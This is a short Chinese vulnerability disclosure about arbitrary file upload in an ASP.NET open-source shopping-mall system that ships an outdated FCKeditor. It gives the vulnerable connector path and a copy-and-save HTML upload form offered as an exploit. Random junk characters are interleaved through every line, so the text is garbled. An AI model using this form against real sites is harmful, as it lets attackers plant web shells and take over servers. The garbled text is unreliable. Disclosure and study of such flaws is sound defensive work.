披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中' E& ]' I; M* W: O' k7 y1 i/ M& }
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开
, Y& W: f9 u" P0 F6 ~" m 简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。; l7 z* M$ W8 @! r0 J8 f" `1 ?9 p
详细说明:其他版本我没测试,估计也是一样的问题
+ t0 {' M2 K+ @& W http://127.0.0.1/controls/fckedi ... aspx/connector.aspx5 q6 y- o( H4 r4 e. [
跳转到网站根目录上传任意文件。+ q) m7 U, k" D) F' I6 M2 m# C5 N
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
* {, f* d7 I+ o. ~4 \2 M) E a <form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
( a# ?2 H0 v. G% o Upload a new file:<br>
) i* b" E% P4 ]# l6 T <input type="file" name="NewFile" size="50"><br>
* X3 E2 E) p! s* e- O <input id="btnUpload" type="submit" value="Upload">
/ b! q+ J/ v2 ^# v; Q `/ D </form> |